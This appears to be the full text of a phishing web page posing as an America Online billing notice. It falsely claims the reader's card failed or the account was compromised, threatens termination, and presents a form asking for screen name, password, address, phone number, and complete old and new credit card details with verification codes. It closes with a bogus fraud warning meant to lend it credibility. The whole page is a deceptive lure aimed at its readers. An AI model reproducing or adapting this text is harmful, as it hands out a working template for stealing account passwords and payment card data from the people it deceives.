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Dear America Online User,

This site has been created as a secure transaction site for information over the Internet. Understand that you have been referred to this site for one of the following reasons, stated below. Please fill out the requested information contained within this site, so that we at America Online are able to continue providing internet service to your account.

1. Your credit card failed to be properly authorized, it has expired, or as been found to be on record with America Online under a different account. In order to remedy this problem it is suggested that you provide another credit card that can be billed for your America Online Services. In order to ensure that your America Online account remains active please make sure that the new credit card provided has not been used to pay for America Online services in the past 6 months, this is required in order to avoid further complications pertaining to your account.

2. Your America Online Account has been accessed by an outside source, other than yourself, causing America Online Representatives to issue you a different password. It is now required that you fill out and submit all necessary account information in order to verify that your America Online Account has not been further compromised by outside sources. You must enter a new credit card number that has not been used to pay for America Online Services within the past 6 months.

3. An E-mail was sent to your account that inquired about your account status. If you have received an E-mail from anyone other than an America Online Staff Member, please disregard that mail as it may be fraudulent, possibly causing a third party to gain access to you America Online Account. After your new account information has been processed you will be redirected back to Please verify all of your entered information prior to submitting. Improper information or delay in providing said information may cause interruption in services or possible termination of your America Online Account.

Thank you in advance for your cooperation.

-AOL Credit Card Verification Team (CVT) and Community Action Team (CAT)

Screen Name
Confirm Password
Full Name
Billing Address
Zip Code
Phone Number
Enter Your OLD Credit Card Information Below
AOL Billing
Card Type
Name On Card
Card Number
Card Expires Year:
Card Verification Code
Enter Your New Credit Card Information Below.
AOL Billing
Card Type
Name On Card
Card Number
Card Expires Year:
Card Verification Code

AOL Billing
Thank You for making AOL Number 1!
SteveCase, CEO of America Online

WARNING: Credit-card fraud is a criminal offense.
For your protection all transactions are carefully monitored and logged including IP addresses, ISP, and other pertinent information.

*Providing false or fraudulent information will be prosecuted to the fullest extent of the law*